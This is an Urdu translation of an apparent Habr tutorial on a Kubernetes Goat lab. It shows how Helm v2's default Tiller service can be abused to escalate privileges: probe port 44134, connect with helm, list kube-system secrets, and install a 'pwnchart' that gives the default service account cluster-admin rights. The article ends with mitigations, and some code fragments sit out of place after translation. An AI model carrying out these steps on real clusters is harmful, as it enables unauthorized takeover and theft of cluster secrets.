ہیلم Kubernetes کے لیے ایک پیکیج مینیجر ہے، کچھ اس طرح apt-get
Ubuntu کے لئے. اس نوٹ میں ہم ہیلم (v2) کا پچھلا ورژن دیکھیں گے جس میں ٹیلر سروس بطور ڈیفالٹ انسٹال ہے، جس کے ذریعے ہم کلسٹر تک رسائی حاصل کریں گے۔
آئیے کلسٹر تیار کریں؛ ایسا کرنے کے لیے، کمانڈ چلائیں:
kubectl run --rm --restart=Never -it --image=madhuakula/k8s-goat-helm-tiller -- bash
مظاہرہ
- اگر آپ کچھ اضافی کنفیگر نہیں کرتے ہیں، تو ہیلم v2 ٹیلر سروس شروع کرتا ہے، جس میں کلسٹر ایڈمنسٹریٹر کے مکمل حقوق کے ساتھ RBAC ہوتا ہے۔
- نام کی جگہ میں تنصیب کے بعد
kube-system
ظاہر ہوتا ہےtiller-deploy
، اور پورٹ 44134 بھی کھولتا ہے، جو 0.0.0.0 پر پابند ہے۔ اسے ٹیل نیٹ کے ذریعے چیک کیا جا سکتا ہے۔
$ telnet tiller-deploy.kube-system 44134
- اب آپ ٹلر سروس سے جڑ سکتے ہیں۔ ٹلر سروس کے ساتھ بات چیت کرتے وقت ہم آپریشن کرنے کے لیے ہیلم بائنری کا استعمال کریں گے:
$ helm --host tiller-deploy.kube-system:44134 version
- آئیے نام کی جگہ سے Kubernetes کلسٹر کے راز حاصل کرنے کی کوشش کرتے ہیں۔
kube-system
:
$ kubectl get secrets -n kube-system
- اب ہم اپنا چارٹ بنا سکتے ہیں، جس میں ہم منتظم کے حقوق کے ساتھ ایک کردار بنائیں گے اور اس کردار کو ڈیفالٹ سروس اکاؤنٹ میں تفویض کریں گے۔ اس سروس اکاؤنٹ سے ٹوکن کا استعمال کرتے ہوئے، ہمیں اپنے کلسٹر تک مکمل رسائی حاصل ہوئی۔
$ helm --host tiller-deploy.kube-system:44134 install /pwnchart
- اب جب
pwnchart
ڈیفالٹ سروس اکاؤنٹ کو مکمل انتظامی رسائی حاصل ہے۔ آئیے دوبارہ چیک کرتے ہیں کہ راز کیسے حاصل کیا جائے۔kube-system
kubectl get secrets -n kube-system
اس اسکرپٹ کا کامیاب نفاذ اس بات پر منحصر ہے کہ ٹیلر کو کس طرح تعینات کیا گیا تھا؛ بعض اوقات منتظمین اسے مختلف مراعات کے ساتھ علیحدہ نام کی جگہ پر تعینات کرتے ہیں۔ ہیلم 3 ایسی کمزوریوں کے لیے حساس نہیں ہے کیونکہ... اس میں کوئی ٹیلر نہیں ہے.
مترجم کا نوٹ: کلسٹر میں ٹریفک کو فلٹر کرنے کے لیے نیٹ ورک کی پالیسیوں کا استعمال اس قسم کے خطرات سے بچانے میں مدد کرتا ہے۔
ماخذ: www.habr.com